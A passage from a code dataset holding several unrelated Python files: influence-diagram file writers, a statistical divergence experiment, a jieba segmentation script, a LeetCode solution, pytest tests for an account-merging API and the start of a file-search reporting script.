each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'U':\n limid_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n limid_file.close()\n\n\ndef write_erg_from_info(file_name, vo_file, file_info):\n erg_file_name = file_name if file_name.endswith(\".erg\") else file_name + \".erg\"\n erg_file = open(erg_file_name, 'w')\n erg_file.write(\"ID\\n\")\n erg_file.write(\"{}\\n\".format(file_info['nvar']))\n erg_file.write(\"{}\\n\".format(' '.join((str(el) for el in file_info['domains']))))\n erg_file.write(\"{}\\n\".format(' '.join((el.lower() for el in file_info['var_types']))))\n ### erg file shows a temporal ordering (reverse of the elimination ordering in vo_file)\n elim_order, iw = read_vo(vo_file)\n erg_file.write(\"{}\\n\".format(' '.join((str(el) for el in reversed(elim_order)))))\n erg_file.write(\"{}\\n\".format(file_info['nprob']+file_info['ndec']+file_info['nutil']))\n\n ### write probability, decision, utility scopes\n for f_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['factor_types'][f_ind] == 'P':\n erg_file.write(\"p {}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n ### decision scopes\n previous_block = []\n for each_block in reversed(file_info['blocks']):\n if len(each_block) == 1 and file_info['var_types'][each_block[0]] == 'D':\n decision_scope = previous_block + each_block # [ parents ] + [ decision ]\n erg_file.write(\"d {}\\n\".format(' '.join([str(len(decision_scope))] + [str(el) for el in decision_scope])))\n previous_block = each_block\n for f_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['factor_types'][f_ind] == 'U':\n erg_file.write(\"u {}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n erg_file.write(\"\\n\")\n\n ### write probability, decision, utility tables\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'P':\n erg_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n for _ in range(file_info['ndec']):\n erg_file.write(\"0\\n\")\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'U':\n erg_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n erg_file.close()\n\n\n########################################################################################################################\n# write pure mmap or mixed mmap from file_info\ndef write_uai_mmap(file_name, file_info, uai_type=\"MARKOV\"):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n map_file_name = file_name.replace(\".uai\", \".map\") if file_name.endswith(\".uai\") else file_name + \".map\"\n\n write_standard_uai(uai_file_name, file_info, uai_type)\n write_map_from_types(map_file_name, file_info['var_types'])\n\n\ndef write_uai_mixed(file_name, file_info, uai_type=\"MARKOV\"):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n mi_file_name = file_name.replace(\".uai\", \".mi\") if file_name.endswith(\".uai\") else file_name + \".mi\"\n write_standard_uai(uai_file_name, file_info, uai_type)\n write_pvo_from_partial_elim_order(pvo_file_name, file_info['blocks'])\n 
write_mi_from_types(mi_file_name, file_info['var_types'])\n\n########################################################################################################################\n# convert formats\ndef convert_uai_id_to_mixed(uai_file_name, mixed_file_name):\n id_file_info = read_uai_id(uai_file_name, sort_scope=False)\n mmap_file_info = translate_uai_id_to_mixed(id_file_info)\n write_uai_mixed(mixed_file_name, mmap_file_info)\n\n\ndef convert_mmap_to_mixed(mmap_file_name, mixed_file_name):\n file_info = read_uai_mmap(mmap_file_name, sort_scope=False)\n write_uai_mixed(mixed_file_name, file_info)\n\n\ndef convert_uai_to_limid(uai_file_name, limid_file_name):\n file_info = read_uai_id(uai_file_name, sort_scope=False)\n write_limid_from_info(limid_file_name, file_info)\n\n\ndef convert_uai_to_erg(uai_file_name, vo_file, erg_file_name):\n file_info = read_uai_id(uai_file_name, sort_scope=False)\n write_erg_from_info(erg_file_name, vo_file, file_info)\n\n\ndef convert_erg_to_uai(erg_file_name, uai_file_name):\n file_info = read_erg(erg_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\ndef convert_erg_to_limid(erg_file_name, limid_file_name):\n file_info = read_erg(erg_file_name, sort_scope=False)\n write_limid_from_info(limid_file_name, file_info)\n\n\ndef convert_limid_to_uai(limid_file_name, uai_file_name):\n file_info = read_limid(limid_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\ndef convert_limid_to_erg(limid_file_name, vo_file, erg_file_name):\n raise NotImplementedError # detour uai_id\n\n\ndef convert_maua_to_uai(maua_file_name, uai_file_name):\n file_info = read_maua(maua_file_name, sort_scope=False)\n write_uai_id_from_info(uai_file_name, file_info)\n\n\n########################################################################################################################\n# write influce diagrams from nx graph\ndef write_uai_from_nx_graph(file_name, influence_diagram):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"ID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['node_type'] == 'C':\n chance_variables.append(n)\n elif influence_diagram.node[n]['node_type'] == 'D':\n decision_variables.append(n)\n elif influence_diagram.node[n]['node_type'] == 'U':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write domains of variables\n num_vars = len(chance_variables) + len(decision_variables)\n num_funcs = len(chance_variables) + len(value_nodes)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['node_type'] in ['C', 'D']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n\n # prob functions -> utility functions\n ### write scope of functions\n uai_file.write(\"{}\\n\".format(num_funcs))\n for var_id in chance_variables + value_nodes:\n if var_id in decision_variables: # only write probability functions\n continue\n scope_line = [len(influence_diagram.node[var_id]['scope'])] + influence_diagram.node[var_id]['scope']\n uai_file.write(\"{}\\n\".format(\" \".join(str(el) for el in scope_line)))\n\n uai_file.write(\"\\n\")\n ### write 
tables\n for var_id in chance_variables + value_nodes:\n table_length = influence_diagram.node[var_id]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[var_id]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\ndef write_erg_from_nx_graph(file_name, influence_diagram, temporal_ordering):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"ID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['type'] == 'chance':\n chance_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'decision':\n decision_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'value':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write num vars, domains, types\n num_vars = len(chance_variables) + len(decision_variables)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['type'] in ['chance', 'decision']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n var_types = ['d' if el in decision_variables else 'c' for el in range(num_vars)]\n uai_file.write(\"{}\\n\".format(\" \".join(var_types)))\n var_ordering = [temporal_ordering[el] for el in range(num_vars)]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in var_ordering])))\n\n ### write functions scopes\n num_funcs = len(chance_variables) + len(decision_variables) + len(value_nodes)\n uai_file.write(\"{}\\n\".format(num_funcs))\n for n in chance_variables + decision_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n scope_line = []\n if influence_diagram.node[n]['type'] == 'chance':\n scope_line.append('p')\n elif influence_diagram.node[n]['type'] == 'decision':\n scope_line.append('d')\n elif influence_diagram.node[n]['type'] == 'value':\n scope_line.append('u')\n else:\n assert False, \"unknown node type in influence diagram\"\n scope_line.append(len(influence_diagram.node[n]['scope']))\n scope_line.extend(influence_diagram.node[n]['scope'])\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in scope_line])))\n\n uai_file.write(\"\\n\")\n ### write tables\n for n in chance_variables + decision_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n if n in decision_variables:\n uai_file.write(\"{}\\n\".format(0))\n else:\n table_length = influence_diagram.node[n]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[n]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\ndef write_limid_from_nx_graph(file_name, influence_diagram):\n ### var_id and node_id are identical for chance, decision variables\n ### values nodes are shown up at the end of the nodes\n ### open a file\n uai_file = open(file_name, 'w')\n uai_file.write(\"LIMID\\n\")\n\n ### read variables\n chance_variables = []\n decision_variables = []\n value_nodes = []\n for n in sorted(influence_diagram.nodes_iter()):\n if influence_diagram.node[n]['type'] == 'chance':\n 
chance_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'decision':\n decision_variables.append(n)\n elif influence_diagram.node[n]['type'] == 'value':\n value_nodes.append(n)\n else:\n assert False, \"unknown node type in influenec diagram\"\n\n ### write num vars, domains, types\n num_vars = len(chance_variables) + len(decision_variables)\n uai_file.write(\"{}\\n\".format(num_vars))\n domains = [influence_diagram.node[n]['domain_size'] for n in sorted(influence_diagram.nodes_iter())\n if influence_diagram.node[n]['type'] in ['chance', 'decision']]\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in domains])))\n\n ### write function scopes, prob-dec-util\n uai_file.write(\"{}\\n\".format(len(chance_variables)))\n uai_file.write(\"{}\\n\".format(len(decision_variables)))\n uai_file.write(\"{}\\n\".format(len(value_nodes)))\n for n in chance_variables + decision_variables + value_nodes:\n scope_line = [len(influence_diagram.node[n]['scope'])]\n scope_line.extend(influence_diagram.node[n]['scope'])\n uai_file.write(\"{}\\n\".format(\" \".join([str(el) for el in scope_line])))\n\n uai_file.write(\"\\n\")\n ### write tables\n for n in chance_variables + value_nodes: # node id are strating from 0 to num_var-1 | util nodes\n table_length = influence_diagram.node[n]['table_length']\n uai_file.write(\"{}\\n\".format(table_length))\n table = influence_diagram.node[n]['table']\n uai_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in table)))\n uai_file.write(\"\\n\")\n uai_file.close()\n\n\n########################################################################################################################\n# write mini bucket heuristic\ndef write_mini_bucket_heuristic_from_info(file_name, heur_info):\n file_name = file_name if file_name.endswith(\".heur\") else file_name + \".heur\"\n heur_file = open(file_name, 'w')\n heur_file.write(\"{} {} {}\\n\".format(heur_info['num_var'], heur_info['num_msg'], heur_info['msg_id_start']))\n for var in range(heur_info['num_var']):\n if len(heur_info['bucket_msg'][var]) == 0:\n msg_str = \"\"\n else:\n msg_str = ' '.join([str(i) for i in heur_info['bucket_msg'][var]])\n heur_file.write(\"{} {} {}\\n\".format(var, len(heur_info['bucket_msg'][var]), msg_str ))\n heur_file.write(\"\\n\")\n\n for msg_id in range(heur_info['msg_id_start'], heur_info['msg_id_start']+heur_info['num_msg']):\n prob_msg = heur_info['msg_indexer'][msg_id].prob\n if type(prob_msg) != Factor:\n heur_file.write(\"0\\n\")\n heur_file.write(\"1\\n\")\n heur_file.write(\"{}\\n\".format(prob_msg))\n else:\n scope_str = \" \".join([str(el) for el in prob_msg.vars] )\n heur_file.write( \"{} {}\\n\".format(len(prob_msg.vars), scope_str) )\n heur_file.write(\"{}\\n\".format(prob_msg.numel()))\n table_str = \"\\n\".join(map(str, prob_msg.table.ravel(order='C')))\n heur_file.write( \"{}\\n\".format(table_str))\n\n value_msg = heur_info['msg_indexer'][msg_id].util\n if type(value_msg) != Factor:\n heur_file.write(\"0\\n\")\n heur_file.write(\"1\\n\")\n heur_file.write(\"{}\\n\".format(value_msg))\n else:\n scope_str = \" \".join([str(el) for el in value_msg.vars])\n heur_file.write(\"{} {}\\n\".format(len(value_msg.vars), scope_str))\n heur_file.write(\"{}\\n\".format(value_msg.numel()))\n table_str = \"\\n\".join(map(str, value_msg.table.ravel(order='C')))\n heur_file.write(\"{}\\n\".format(table_str))\n\n 
heur_file.write(\"\\n\")\n\n\n\n\n\n\n","repo_name":"junkyul/gmid-public","sub_path":"gmid/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":50872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35070368269","text":"\n\nimport math\nimport sys\n\nfrom LeucipPy import HtmlReportMaker as hrm\nfrom LeucipPy import WilliamsDivergenceMaker as wcm\nimport A0_Globals as globals\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nfrom datetime import datetime as dt\n#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\ndef getTime():\n now = dt.now()\n tm = now.strftime(\"%a %d%h%y-%H:%M:%S\")\n return tm\ndef openLog(logfile, msg):\n f = open(logfile, \"w\")\n f.write(getTime() + \" :\\tStarting log file for LeucipPy\\n\" + msg + '\\n')\n f.close()\n print(msg)\n\ndef log(logfile, msg):\n f = open(logfile, \"a\")\n f.write(getTime() + \" :\\t\" + msg + '\\n')\n f.close()\n print(msg)\n\ndef run(str_density,str_bins,str_iters):\n normed_corr = True\n density = float(str_density)\n iters = int(str_iters)\n bins = int(str_bins)\n randOrline = 'three'#'line' #rand or line or covar\n varis = [0,0.1,0.5,1,10]#,50,500]\n resample = True\n #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n html_file = \"Html/A01_Baseline_\"+randOrline+str(iters)+'_'+str(density)+\".html\"\n csv_file = \"Csv/A01_Baseline_\"+randOrline+str(iters)+'_'+str(density)+\".csv\"\n log_file = \"Log/A01_Baseline_\" + randOrline + str(iters)+'_'+str(density)+\".log\"\n rep = hrm.HtmlReportMaker(\"Williams Divergence From Trivial: Variance Comparison, Density=\" + str(density),html_file,cols=2)\n openLog(log_file,randOrline + str(iters))\n samples = [200,500,750,1000,1500,2000,5000,10000]\n fake_geos = []\n geo_pairs = []\n log(log_file,'Create samples')\n div_per_sample = {}\n\n for sample in samples:\n dic_fake_all = {}\n for vi in varis:\n log(log_file, 'samples=' + str(sample) + ' vi=' + str(vi))\n tag = str(vi) + '_'+ str(sample)\n fake_geos.append(tag+'A')\n fake_geos.append(tag+'B')\n geo_pairs.append([sample,vi,tag+'A',tag+'B'])\n dic_fake_all[tag+'A'] = []\n dic_fake_all[tag+'B'] = []\n for i in range(0,sample):\n l = i % 20\n count = 10 # samplesize\n dic_fake_all[tag+'A'].append(np.random.normal(l, int(count * vi)))\n dic_fake_all[tag+'B'].append(np.random.normal(l, int(count * vi)))\n #dic_fake_all[tag+'A'].append(np.random.normal(i, int(sample*vi)))\n #dic_fake_all[tag + 'B'].append(np.random.normal(i, int(sample * vi)))\n\n #print(dic_fake_all)\n df_sample = pd.DataFrame.from_dict(dic_fake_all)\n print(df_sample.columns)\n if str_density == '0':\n density = sample/(bins*bins)\n div_per_sample[sample] =wcm.WilliamsDivergenceMaker(df_sample,fake_geos,density=density,log=1,norm=normed_corr,pval_iters=iters,delay_load=True,p_resample=resample)\n print('######',sample)\n print(div_per_sample,sample)\n print('###############')\n # create a df with the coefficients\n dic_fake = {'stat': [],'p_value':[],'bins':[],'samples':[],'set':[],'density':[],'stat2':[],'random':[]}\n for sample,vi,geoA,geoB in geo_pairs:\n log(log_file, 'Creating divergence dataframe=' + str(sample) + geoA + ' ' + geoB)\n dm = div_per_sample[sample]\n div = dm.getCorrelation([geoA,geoB])\n stat, pvalue, A, D, B = div.stat,div.p_value,div.histAB,div.diffAB,div.convAB\n stat2 = math.log(stat*density)\n dic_fake['stat'].append(stat)\n dic_fake['stat2'].append(stat2)\n 
dic_fake['density'].append(density)\n dic_fake['p_value'].append(pvalue)\n dic_fake['bins'].append(dm.bins)\n dic_fake['samples'].append(sample)\n dic_fake['random'].append(vi)\n dic_fake['set'].append(geoA)\n # operation to normalise\n df_fake = pd.DataFrame.from_dict(dic_fake).round(4)\n df_fake.to_csv(csv_file,index=False)\n #add a seaborn lineplot for all bins\n log(log_file, 'Make line plots')\n rep.addLineComment('Compare coefficients')\n rep.changeColNumber(2)\n\n #rep.addPlot2d(df_fake,'scatter',geo_x='samples',geo_y='stat',hue='random',yrange=[0,1])\n #rep.addPlot2d(df_fake, 'scatter', geo_x='random', geo_y='stat', hue='samples',yrange=[0,1])\n #rep.addPlot2d(df_fake[df_fake['samples']==1000], 'seaborn', geo_x='random', geo_y='stat', hue='set',yrange=[0,1])\n\n ############################################\n ys = ['stat','p_value']\n for y in ys:\n fig, ax = plt.subplots()\n sns.lineplot(data=df_fake,x='random',y=y,hue='samples',palette='tab10')\n plt.title('Change at different randomness, per sample size')\n plt.legend(title='sample size',bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.ylim(0,1)\n rep.addPlotOnly(fig, ax)\n ############################################\n fig, ax = plt.subplots()\n sns.lineplot(data=df_fake, x='samples', y=y, hue='random',palette='tab10')\n plt.title('Change over sample size, per randomness')\n plt.legend(title='randomness',bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.ylim(0, 1)\n rep.addPlotOnly(fig, ax)\n ##############################\n\n rep.changeColNumber(3)\n rep.addLineComment('Data in the dataframes')\n for sample in samples:\n rep.addDataFrame(df_fake[df_fake['samples']==sample],title='Sample size=' + str(sample))\n\n log(log_file, 'Make distribution plots')\n rep.addLineComment('Plots of distributions')\n\n rep.changeColNumber(7)\n for sample,vi, geoA, geoB in geo_pairs:\n #rep.addLineComment(geoA + geoB, + 'Samples = ')\n if sample == 1000:\n log(log_file, 'Plots ' + geoA + ' ' + geoB)\n dm = div_per_sample[sample]\n cm_data = dm.data\n df_rand = dm.randomiseData(cm_data,[geoA, geoB])\n df_samp = dm.resampleData(cm_data,[geoA,geoB])\n print(df_samp)\n div = dm.getCorrelation([geoA, geoB])\n stat,pvalue,A,D,B = div.stat,div.p_value,div.histAB,div.diffAB,div.convAB\n mean,sd,hist = div.p_mean,div.p_std,div.p_hist\n maxV = max(np.max(A),np.max(B))\n rep.addPlot2d(cm_data, 'scatter', title=str(round(stat,3)) + ' orig vari=' + str(vi), geo_x=geoA, geo_y=geoB, hue=geoA)\n rep.addPlot2d(df_rand, 'scatter',title='rand, size=' + str(sample), geo_x=geoA, geo_y=geoB, hue=geoA)\n rep.addPlot2d(df_samp, 'scatter', title='resampled, size=' + str(sample), geo_x=geoA, geo_y=geoB, hue=geoA)\n if len(hist['divergence'])>0:\n crit_val = round(dm.getCriticalValue(geoA,geoB,0.95),3)\n rep.addPlot1d(hist,'histogram',geo_x='divergence',title='mean=' + str(round(mean,3)) + ' sd=' + str(round(sd,3)) + ' crit5%=' + str(crit_val))\n else:\n rep.addBoxComment(('No histogram calculated'))\n rep.addSurface(A,'Original Data',cmin=0,cmax=maxV,palette='Blues',colourbar=False)\n rep.addSurface(D, 'Difference Data stat=' + str(round(stat,3)) + ' pvalue=' + str(round(pvalue,3)), cmin=-1*maxV, cmax=maxV, palette='RdBu',colourbar=False)\n rep.addSurface(B, 'Convolved Data', cmin=0, cmax=maxV, palette='Reds',colourbar=False)\n\n log(log_file, 'Finally print out')\n rep.printReport()\n\n\nif __name__ == '__main__':\n 
globals()['run'](sys.argv[1],sys.argv[2],sys.argv[3])\n","repo_name":"RachelAlcraft/LeucipPipelines","sub_path":"Pipelines/DivergenceMetric/A01_CompareBaselinesVariance_OutProc.py","file_name":"A01_CompareBaselinesVariance_OutProc.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16868835660","text":"# -*- coding: UTF-8 -*-\n# -*- Author: Jacklanda\nimport jieba\n\nimport io, re\n\n# 加载自己的自己的词库\njieba.load_userdict(\"./stopword.txt\")\n\ndef main():\n with io.open('./Pos-train.txt','r',encoding='utf-8') as content:\n for line in content:\n seg_list = jieba.cut(line)\n # print('/'.join(seg_list))\n with io.open('./seg2.txt', 'a+', encoding='utf-8') as output:\n line_word = ' '. join(seg_list)\n content = re.findall('[\\u4e00-\\u9fa5]+', line_word)\n print(content)\n output.write(' '.join(content))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"jacklanda/failled-experiment","sub_path":"src/dataAnal/test/test_jieba.py","file_name":"test_jieba.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39658747000","text":"from datetime import time\nimport unittest\nfrom typing import List\nfrom pprint import pprint\n\n\nclass Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n return duration + sum(min(timeSeries[i+1]-timeSeries[i], duration) for i in range(len(timeSeries)-1))\n\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n timeSeries = [1, 4]\n duration = 2\n expected = 4\n self.assertEqual(sol.findPoisonedDuration(\n timeSeries, duration), expected)\n\n def test_case_2(self):\n sol = Solution()\n timeSeries = [1, 2]\n duration = 2\n expected = 3\n self.assertEqual(sol.findPoisonedDuration(\n timeSeries, duration), expected)\n\n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/cn/495_teemo_attacking.py","file_name":"495_teemo_attacking.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1846985200","text":"import pytest\nfrom utils.requesttool import request\nfrom utils.pysql import PyMySQL\nfrom utils.loaddata import LoadEnvData\nfrom utils.requesttool import loadcase\nfrom utils.log import callback_log,combinelogger\nfrom data.combine_returncode_enum import CombineReturnCodeEnum\n\ncombinelist=[]\n\n@LoadEnvData(host=\"test_combineapi\",path=\"combine_path\",data=\"combine.yml\")\nclass Combine():\n def __init__(self):\n #从数据库选取一个有手机的custid作为父账号\n self.custid=self.cf_presetvar.get('combine','cust_unbind')\n\n # 从数据库选取一个没有手机的账户,作为子账号\n self.custid_no_phone=self.cf_presetvar.get('combine','cust_unbind_weixin')\n\n @loadcase(combinelist)\n def params_invalid(self):\n '''参数校验-必填字段为空'''\n #custid_parent为空\n\n request_data=self.initparams\n request_data['custid_parent']=''\n\n status_error_code = CombineReturnCodeEnum.PARAM_ERROR_PREFIX.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_notexist(self):\n '''父账号或子账号cust_id不存在'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent']= '123123123'\n request_data['custid_child'] = '321321321'\n status_error_code = CombineReturnCodeEnum.CUSTID_IS_NOT_EXIST.value\n\n return 
request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_nophone(self):\n '''父账号未绑定手机'''\n request_data = dict(self.initparams)\n\n sql = \"select cust_id from customer where cust_id>0 and cust_mobile='' limit 1\"\n request_data['custid_parent']=PyMySQL().mysqlget(sql)\n status_error_code=CombineReturnCodeEnum.CUSTID_NOT_BIND_MOBILE.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_child_bindphone(self):\n '''子账号已绑定手机'''\n request_data = dict(self.initparams)\n\n sql = \"select cust_id from customer where cust_id>0 and cust_mobile<>'' limit 5,1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n request_data['custid_parent'] = self.custid\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_MOBILE.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_already_bind_wechat(self):\n '''父账号已绑定微信'''\n request_data = dict(self.initparams)\n #从customer_combine中选择一个cust_id\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third_wechat where cust_bind_type=2) and cust_mobile<>'' limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n #未绑定微信的cust_id\n sql=\"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_third_wechat where cust_bind_type=1) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_WEIXIN.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_parent_already_bind_qq(self):\n '''父账号已绑定qq'''\n request_data = dict(self.initparams)\n thirdid=6 #qq\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third where third_id=6) and cust_mobile<>'' limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n sql = \"select cust_id from customer where cust_id in (\" \\\n \" select cust_id from customer_third where third_id=6) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_BIND_WEIXIN.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_child_already_combine(self):\n '''子账号发生过绑定'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent'] = self.custid\n # 发生过绑定的cust_id\n sql = \"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_combine ) and cust_mobile='' limit 1\"\n request_data['custid_child'] = PyMySQL().mysqlget(sql)\n\n status_error_code = CombineReturnCodeEnum.CUSTID_COMBINE_REPEAT_VERIFY_FAIL.value\n\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_apply_cancel_deny(self):\n '''提交注销申请的账户不能合并'''\n request_data = dict(self.initparams)\n\n # 注销申请的cust_id\n sql = \"select cust_id from customer where cust_id in (select cust_id from \" \\\n \"customer_cancel_apply where cust_mobile<>'' ) and cust_status!=-1 limit 1\"\n request_data['custid_parent'] = PyMySQL().mysqlget(sql)\n\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ALREADY_APPLY_CANCEL.value\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def custid_enterprise_deny(self):\n '''企业账号不能合并'''\n request_data = dict(self.initparams)\n\n #父账号为企业账号\n custid=self.cf_presetvar.get('combine','enterprise_cust_id') #预定义变量中获取企业账号\n 
request_data['custid_parent'] = custid\n\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.CUSTID_ENTERPRISE_VERIFY_FAIL.value\n return request_data, status_error_code\n\n @loadcase(combinelist)\n def combine_success(self):\n '''合并微信账号成功'''\n request_data = dict(self.initparams)\n\n request_data['custid_parent'] = self.custid\n request_data['custid_child'] = self.custid_no_phone\n\n status_error_code = CombineReturnCodeEnum.SUCCESS.value\n return request_data, status_error_code\n\n\ndef teardown_module():\n '''用例结果数据销毁'''\n combine=Combine()\n custidlist=[combine.custid,combine.custid_no_phone]\n for custid in custidlist:\n data={'cust_id':custid}\n PyMySQL().mysqldel('customer_combine',data)\n\ncombine = Combine()\ndatalist = [ele(combine) for ele in combinelist]\n\n@pytest.fixture(params=datalist)\ndef pyfixture(request):\n return request.param\n\n@pytest.mark.combine\n@pytest.mark.flaky(reruns=1, reruns_delay=5)\ndef test_Combine(pyfixture,hook=callback_log):\n # 请求\n url = Combine.url\n data = pyfixture[0]\n res = request(url=url, data=data)\n # print(data)\n if hook: # 写日志,写在assert断言之前\n callback_log(url, data, res, combinelogger,return_msg=pyfixture[1][1])\n\n assert res['return_code'] == pyfixture[1][0]","repo_name":"gitchenping/apitest","sub_path":"testcase/Combineapi/Combine_test.py","file_name":"Combine_test.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43328558055","text":"from search import Search\nfrom datetime import datetime, timezone\nimport json\nimport pandas as pd\nimport numpy as np\nimport time\nimport openpyxl\nfrom openpyxl.styles import Font, Fill\n\n# Global variables\ndf: pd.DataFrame\nreport_file = f\"file-search-results-{datetime.today().strftime('%Y-%m-%d')}.xlsx\"\nworkbook_objects = []\n\n# Customize Search Settings\n# Create instance of Search object\nsearch = Search(search_path='/users/kyleking/projects/file_system_utilities',\n recursive=True,\n return_all=True,\n exclude=['.map', 'venv', '.pyc', '__pycache__', '.DS_Store', 'ignore', '.idea', 'git'],\n include=[])\n\n\ndef get_search_results():\n global df\n df = pd.DataFrame(search.execute())\n df = pd.concat([df, df[\"results\"].apply(pd.Series)], axis=1)\n df = df.drop(['results'], axis=1)\n\n\ndef transform_results():\n fix_missing_values()\n add_size_classification()\n add_file_aging_classification()\n\n\ndef generate_report_data():\n # Output (order of list prior to export will dictate the sheet order)\n add_about_page()\n add_search_results()\n\n add_pivot_by_file_aging_and_type()\n add_pivot_by_file_size()\n\n add_pivot_by_folder_aging_and_type()\n add_pivot_by_folder_size()\n\n export_to_excel(report_file)\n update_about_page()\n\n\ndef fix_missing_values():\n # Fix Missing/NaN values\n df['file_mime_type'] = df['file_mime_type'].fillna('Not Available')\n\n\ndef add_size_classification():\n conditions = 